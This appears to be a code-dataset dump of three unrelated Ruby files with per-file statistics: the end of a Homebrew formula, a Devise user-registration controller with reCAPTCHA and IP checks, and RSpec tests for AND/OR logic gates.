    <key>RunAtLoad</key>
    <true/>
  </dict>
  </plist>
  EOS
end

test do
  assert_match version.to_s, shell_output("#{bin}/scm-cli-client version")
end
end
| 31.205479 | 159 | 0.674715 |
284dd0d84dbfa48a9fd201c9b4ab8481025d63dd | 3,313 | class Users::RegistrationsController < Devise::RegistrationsController
layout "registrations"
# Runs before new/create; presumably loads select-box data for the signup
# form — see load_registration_form_data (defined elsewhere), TODO confirm.
before_filter :load_registration_form_data, only: [:new, :create]
# Strong-parameters whitelist for user signup/update.
# Returns nil when the request carries no :user payload.
def permit_params
  return unless params[:user]

  params.require(:user).permit(
    *%i[
      birthday description email icon icon_url locale login name
      password password_confirmation pi_consent place_id
      preferred_observation_fields_by preferred_observation_license
      preferred_photo_license preferred_sound_license
      prefers_community_taxa time_zone
    ]
  )
end
# POST /users — Devise registration override.
#
# Runs several gatekeeping checks before persisting the new user: reCAPTCHA
# (HTML, non-mobile requests only), an IP-reputation block, and a guard
# against an already-authenticated session. On success the user is signed in
# and redirected (or rendered as JSON); on failure the signup form is
# re-rendered / JSON errors are returned.
def create
  build_resource(permit_params)
  resource.site = @site
  requestor_ip = Logstasher.ip_from_request_env(request.env)
  resource.last_ip = requestor_ip
  # reCAPTCHA is skipped for the mobile app and for JSON API clients.
  if @site.using_recaptcha? && !is_mobile_app? && !request.format.json?
    if !GoogleRecaptcha.verify_recaptcha( response: params["g-recaptcha-response"],
      remoteip: requestor_ip,
      secret: @site.google_recaptcha_secret )
      errors = [ I18n.t( :recaptcha_verification_failed ) ]
      resource.errors.add(:recaptcha, I18n.t( :recaptcha_verification_failed ) )
    end
  end
  # Reject IPs with a history of suspended accounts, and log the attempt.
  if User.ip_address_is_often_suspended( requestor_ip )
    errors ||= []
    errors << I18n.t( :there_was_a_problem_creating_this_account )
    resource.errors.add( :recaptcha, I18n.t( :there_was_a_problem_creating_this_account ) )
    Logstasher.write_custom_log(
      "User create failed: #{requestor_ip}", request: request, session: session, user: resource )
  end
  # If for some reason a user is already signed in, don't allow them to make
  # another user
  if current_user && current_user.id != Devise::Strategies::ApplicationJsonWebToken::ANONYMOUS_USER_ID
    errors ||= []
    errors << I18n.t( :user_already_authenticated )
  end
  # `errors` is nil when every check above passed (a local assigned only in
  # untaken branches still reads as nil here).
  unless errors
    resource.wait_for_index_refresh = true
    if resource.save
      if resource.active_for_authentication?
        set_flash_message :notice, :signed_up if is_navigational_format?
        sign_in(resource_name, resource)
        respond_with(resource) do |format|
          format.html do
            # Prefer an explicit post-signup return path stashed in the session.
            if session[:return_to_for_new_user]
              redirect_to session[:return_to_for_new_user]
            elsif session[:return_to]
              redirect_to session[:return_to]
            else
              redirect_to home_path( new_user: true )
            end
          end
          format.json do
            render :json => resource.as_json(User.default_json_options)
          end
        end
        return
      else
        # Saved but not yet active for authentication (e.g. pending confirmation).
        set_flash_message :notice, :"signed_up_but_#{resource.inactive_message}" if is_navigational_format?
        expire_session_data_after_sign_in!
        redirect_to root_url
        return
      end
    else
      errors = resource.errors.full_messages
    end
  end
  # Fall-through: gatekeeping or validation failed.
  clean_up_passwords resource
  respond_with(resource) do |format|
    format.html { render :new }
    format.json { render json: { errors: errors }, status: :unprocessable_entity }
  end
end
end
| 32.165049 | 109 | 0.630244 |
bfa68015049124ec179d5f0f9d3c2a1ab1e398a9 | 922 | RSpec.describe RubyCiruits do
it "has a version number" do
  expect(RubyCiruits::VERSION).not_to be nil
end

context "when creating a logic AND gate" do
  # Previously these gates were assigned to constants (AND1..AND3) inside the
  # example group, which defines them at the top level (constant leakage and
  # RSpec warnings) and builds them at file-load time. `let` builds each gate
  # lazily per example instead.
  let(:and_00) { LogicGates::AND.new(0, 0) }
  let(:and_10) { LogicGates::AND.new(1, 0) }
  let(:and_11) { LogicGates::AND.new(1, 1) }

  it "with 2 inputs (0, 0)" do
    expect(and_00.output).to eq(0)
  end

  it "with 2 inputs (1, 0)" do
    expect(and_10.output).to eq(0)
  end

  it "with 2 inputs (1, 1)" do
    expect(and_11.output).to eq(1)
  end
end

context "when creating a logic OR gate" do
  let(:or_00) { LogicGates::OR.new(0, 0) }
  let(:or_10) { LogicGates::OR.new(1, 0) }
  let(:or_11) { LogicGates::OR.new(1, 1) }

  it "with 2 inputs (0, 0)" do
    expect(or_00.output).to eq(0)
  end

  it "with 2 inputs (1, 0)" do
    expect(or_10.output).to eq(1)
  end

  it "with 2 inputs (1, 1)" do
    expect(or_11.output).to eq(1)
  end
end
end
| 20.488889 | 47 | 0.574837 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.